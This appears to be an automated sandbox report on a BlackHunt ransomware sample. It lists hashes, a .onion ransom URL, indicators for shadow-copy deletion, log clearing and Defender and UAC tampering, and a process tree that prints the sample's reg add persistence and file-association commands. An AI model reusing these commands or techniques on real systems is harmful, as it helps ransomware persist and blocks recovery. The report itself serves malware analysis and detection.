Analysis
max time kernel: 91s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/01/2024, 00:05
Static task: static1
Behavioral task: behavioral1
    Sample: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
    Resource: win7-20231215-en
Behavioral task: behavioral2
    Sample: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
    Resource: win10v2004-20231215-en
General
Target: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Size: 707KB
MD5: 7872e09ba0a15441604e90545b04aab7
SHA1: c501ee9736dae19a046715f114e1ac7baf287f2f
SHA256: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f
SHA512: 4304de6648353dc7c4dc5a906e53e66d17018b69d6ffceb9718455288d71fb9237de6ca9755a41d892522f003c8751939c860cdfa54765915c765dd7492bb60a
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I8Qvnh:6uaTmkZJ+naie5OTamgEoKxLW7Oh
Malware Config
Extracted from: C:\ProgramData\#BlackHunt_ReadMe.hta
URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid | Process
7592 | fsutil.exe
13780 | fsutil.exe
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Clears Windows event logs (1 TTPs, 5 IoCs)
pid | Process
8968 | wevtutil.exe
9212 | wevtutil.exe
9780 | wevtutil.exe
7848 | wevtutil.exe
11604 | wevtutil.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
pid | Process
7576 | bcdedit.exe
7636 | bcdedit.exe
8396 | bcdedit.exe
7768 | bcdedit.exe
Renames multiple (3388) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

pid | Process
7548 | wbadmin.exe
8016 | wbadmin.exe
Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | cmd.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\O: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\A: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\G: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\J: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\N: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\M: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\M: | fsutil.exe
File opened (read-only) | \??\R: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\K: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\L: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\X: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\T: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\Z: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\Q: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\Y: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\U: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\I: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\P: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\W: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\V: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\S: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\F: | fsutil.exe
File opened (read-only) | \??\E: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\B: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
File opened (read-only) | \??\F: | WaaSMedicAgent.exe
File opened (read-only) | \??\H: | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
3 | ip-api.com
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Drops file in Program Files directory (64 IoCs)
Process for every row below: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
description | ioc
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\Java\jre-1.8\lib\jsse.jar
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\nub.png
File created | C:\Program Files\Java\jdk-1.8\legal\jdk\#BlackHunt_ReadMe.txt
File created | C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\#BlackHunt_ReadMe.hta
File created | C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#BlackHunt_ReadMe.hta
File created | C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\ui-strings.js
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\ui-strings.js
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\ui-strings.js
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Google\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\#BlackHunt_ReadMe.hta
File created | C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\SplitPublish.jpeg
File opened for modification | C:\Program Files\7-Zip\Lang\ku.txt
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\jce.jar
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar
File created | C:\Program Files\VideoLAN\VLC\locale\nn\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_selectlist_checkmark_18.svg
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fi_get.svg
File created | C:\Program Files\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\th_get.svg
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#BlackHunt_Private.key
File created | C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
pid | pid_target | Process | procid_target
2408 | 6896 | WerFault.exe | 256
Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4288 | schtasks.exe
Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
10076 | vssadmin.exe
7240 | vssadmin.exe
7332 | vssadmin.exe
11704 | vssadmin.exe
4844 | vssadmin.exe
1456 | vssadmin.exe
Kills process with taskkill (1 IoCs)
pid | Process
11092 | taskkill.exe
Modifies registry class (9 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | cmd.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | cmd.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | Conhost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | Conhost.exe
Runs ping.exe (1 TTPs, 1 IoCs)
pid | Process
944 | PING.EXE
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Suspicious use of AdjustPrivilegeToken (24 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeRestorePrivilege | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeBackupPrivilege | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeTakeOwnershipPrivilege | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeAuditPrivilege | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeSecurityPrivilege | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeIncBasePriorityPrivilege | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeBackupPrivilege | 1560 | vssvc.exe
Token: SeRestorePrivilege | 1560 | vssvc.exe
Token: SeAuditPrivilege | 1560 | vssvc.exe
Token: SeBackupPrivilege | 12972 | wbengine.exe
Token: SeRestorePrivilege | 12972 | wbengine.exe
Token: SeSecurityPrivilege | 12972 | wbengine.exe
Token: SeSecurityPrivilege | 9212 | wevtutil.exe
Token: SeBackupPrivilege | 9212 | wevtutil.exe
Token: SeSecurityPrivilege | 8968 | wevtutil.exe
Token: SeBackupPrivilege | 8968 | wevtutil.exe
Token: SeSecurityPrivilege | 11604 | wevtutil.exe
Token: SeBackupPrivilege | 11604 | wevtutil.exe
Token: SeSecurityPrivilege | 7848 | wevtutil.exe
Token: SeBackupPrivilege | 7848 | wevtutil.exe
Token: SeSecurityPrivilege | 9780 | wevtutil.exe
Token: SeBackupPrivilege | 9780 | wevtutil.exe
Token: SeDebugPrivilege | 11092 | taskkill.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Each row below is recorded twice in the report (two IoCs per write), giving 64 entries for the 32 distinct writes.
description | pid | Process | procid_target
PID 2568 wrote to memory of 1556 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 91
PID 2568 wrote to memory of 3876 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 90
PID 2568 wrote to memory of 5036 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 93
PID 2568 wrote to memory of 1648 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 174
PID 2568 wrote to memory of 3292 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 99
PID 1556 wrote to memory of 2832 | 1556 | cmd.exe | 98
PID 2568 wrote to memory of 5064 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 100
PID 2568 wrote to memory of 3732 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 105
PID 3876 wrote to memory of 3280 | 3876 | cmd.exe | 168
PID 5036 wrote to memory of 1268 | 5036 | cmd.exe | 103
PID 1648 wrote to memory of 4340 | 1648 | Conhost.exe | 170
PID 2568 wrote to memory of 2452 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 107
PID 3292 wrote to memory of 2248 | 3292 | cmd.exe | 109
PID 2568 wrote to memory of 1792 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 113
PID 2568 wrote to memory of 2740 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 111
PID 5064 wrote to memory of 4900 | 5064 | cmd.exe | 112
PID 3732 wrote to memory of 1368 | 3732 | cmd.exe | 115
PID 2568 wrote to memory of 4972 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 116
PID 2568 wrote to memory of 2556 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 118
PID 2568 wrote to memory of 2260 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 120
PID 2452 wrote to memory of 396 | 2452 | cmd.exe | 121
PID 2740 wrote to memory of 3556 | 2740 | cmd.exe | 123
PID 2568 wrote to memory of 3068 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 124
PID 1792 wrote to memory of 3972 | 1792 | cmd.exe | 125
PID 2568 wrote to memory of 2224 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 127
PID 2568 wrote to memory of 2436 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 129
PID 2568 wrote to memory of 1352 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 131
PID 2568 wrote to memory of 4692 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 139
PID 2568 wrote to memory of 5116 | 2568 | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe | 132
PID 4972 wrote to memory of 1256 | 4972 | cmd.exe | 134
PID 2556 wrote to memory of 4904 | 2556 | cmd.exe | 138
PID 2260 wrote to memory of 3780 | 2260 | cmd.exe | 135
System policy modification (1 TTPs, 3 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
(Indentation gives the process-tree depth: the sample at level 1, the cmd.exe children it spawns at level 2, and the reg.exe grandchildren at level 3.)

Level 1: C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"
    PID: 2568
    - UAC bypass
    - Checks computer location settings
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification

    Level 2: C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        PID: 3876
        - Suspicious use of WriteProcessMemory

        Level 3: C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            PID: 3280
    Level 2: C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        PID: 1556
        - Suspicious use of WriteProcessMemory

        Level 3: C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
            PID: 2832
            - Modifies registry class
    Level 2: C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        PID: 5036
        - Suspicious use of WriteProcessMemory

        Level 3: C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
            PID: 1268
            - Modifies registry class
    Level 2: C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        PID: 1648

        Level 3: C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            PID: 4340
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2248
-
-
-
